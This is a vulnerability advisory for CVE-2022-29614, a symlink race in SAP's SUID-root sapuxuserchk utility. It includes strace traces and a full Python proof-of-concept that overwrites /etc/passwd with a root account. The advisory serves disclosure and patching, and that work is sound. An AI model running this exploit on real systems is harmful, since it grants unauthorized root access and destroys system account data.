Introduction
A local privilege escalation vulnerability has been identified in the SAP® SAPControl Web Service Interface, specifically within the sapuxuserchk utility. This flaw allows a local attacker to gain root privileges by exploiting a race condition involving symbolic links. Immediate attention and action are recommended to secure affected systems.
Affected Product
- Product: SAP® SAPControl Web Service Interface (sapuxuserchk)
- CVE Number: CVE-2022-29614
- Impact: Medium
- Fixed Version: Refer to SAP® security note 3158619
Business Recommendation
Organizations using the affected SAP products should apply the security updates provided in SAP security note 3158619 as a priority. Timely installation of these patches is crucial to protect business-critical data and maintain system integrity.
Vulnerability Overview
Local Privilege Escalation (CVE-2022-29614)
The sapuxuserchk utility, which is set with SUID-root permissions, incorrectly follows symbolic links when creating temporary local logon tickets. This improper handling allows members of the sapsys group to exploit a race condition, potentially escalating their privileges to root on Unix systems.
Technical Details
The sapuxuserchk utility is invoked by sapcontrol to request temporary local logon tickets, creating them in the directory /usr/sap/A4H/D00/work/sapcontrol_logon/. For instance:
$ sapcontrol -nr 0 -function RequestLogonFile user0
$ ls -l logon*
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0
-rw------- 1 user0 users 40 Feb 25 09:00 logon1
-rw------- 1 root root 40 Feb 25 09:01 logon2
Because sapcontrol needs to create tickets for any system user, sapuxuserchk must run with root privileges:
$ ls -l sapuxuserchk
-rwsr-x--- 1 root sapsys 1312137 Feb 28 2019 sapuxuserchk
When processing a request, sapuxuserchk reads an encrypted message containing the ticket path, username, and ticket data. An example of the plaintext message:
$ strings input-0-plaintext
SAPLOGONFILE /usr/sap/A4H/D00/work/sapcontrol_logon/logon1
user0
1133146902252676394602837452470900726967
The utility performs a check to ensure the file doesn't already exist before creating it. However, there's a race condition between the stat and open system calls:
stat("/usr/sap/A4H/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)
open("/usr/sap/A4H/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3
fchown(3, 1000, 100)
An attacker can exploit this by rapidly creating a symbolic link named logon1 pointing to a sensitive file (e.g., /etc/passwd) while simultaneously invoking sapuxuserchk. If timed correctly, the utility will change the ownership of the target file to the attacker's user ID, granting unauthorized read-write access.
Proof of Concept
The following example demonstrates the exploitation process, where the attacker eventually gains root privileges after multiple attempts:
$ id
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)
$ ls -l /etc/passwd
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd
$ python3 sapRace.py
this many tries: 629
[+] now login as saprace
$ su saprace
Password:
# id
uid=0(saprace) gid=0(root) groups=0(root)
# ls -l /etc/passwd
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd
PoC Script (saprace.py)
import sys, os, signal, base64, random, string

# base64-encoded captured request message for the secadm user (blob elided on this page)
secadm_msg = b'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'
u1_passwd = "saprace:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"
logon_symlink = "/usr/sap/A4H/D00/work/sapcontrol_logon/logon1"
target_file = "/etc/passwd"
g = 1024  # maximum number of attempts for each side of the race

if not os.path.isfile(logon_symlink):
    os.system("touch " + logon_symlink)

secadm_msg = base64.b64decode(secadm_msg)
msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))
with open(msg_file, "wb") as f0:
    f0.write(secadm_msg)

pid = os.fork()
if pid == 0:
    # child: repeatedly feed the request message to the SUID utility
    j = 0
    while True:
        if j > g:
            print('done')
            os._exit(os.EX_OK)
        j += 1
        os.system("/usr/sap/A4H/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))
else:
    # parent: keep replacing logon1 with a symlink and watch for the ownership change
    i = 0
    uid = os.getuid()
    success = False
    while not success:
        if i > g:
            print("[-] give up, link too many tries: " + str(i))
            break
        i += 1
        try:
            os.unlink(logon_symlink)
            os.symlink(target_file, logon_symlink)
            statinfo = os.stat(target_file)
            if statinfo.st_uid == uid:
                # fchown() landed on the target: stop the child and write the new passwd
                os.kill(pid, signal.SIGILL)
                print("this many tries: " + str(i))
                print("[+] now login as saprace")
                with open(target_file, "w") as f:
                    f.write(u1_passwd)
                success = True
        except Exception as err:
            print('[-] lost the race {0}'.format(err))
    os.waitpid(pid, 0)
    os.unlink(msg_file)
Affected Versions
The vulnerability affects the following SAP products and versions:
- SAP NetWeaver AS ABAP, AS Java, ABAP Platform, and HANA Database:
- KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88
- KRNL64NUC 7.22, 7.22EXT, 7.49
- KRNL64UC 7.22, 7.22EXT, 7.49, 7.53
- SAPHOSTAGENT 7.2
Tested Vulnerable Version:
- Version: 753, Patch 400, Changelist 1906766
For detailed information, please refer to SAP’s official security patch day announcement: SAP Security Patch Day – May 2022
Conclusion
This vulnerability poses a significant security risk, allowing local attackers to escalate their privileges to root, potentially compromising the entire system. It is imperative for organizations using the affected SAP products to apply the recommended patches immediately to mitigate this risk.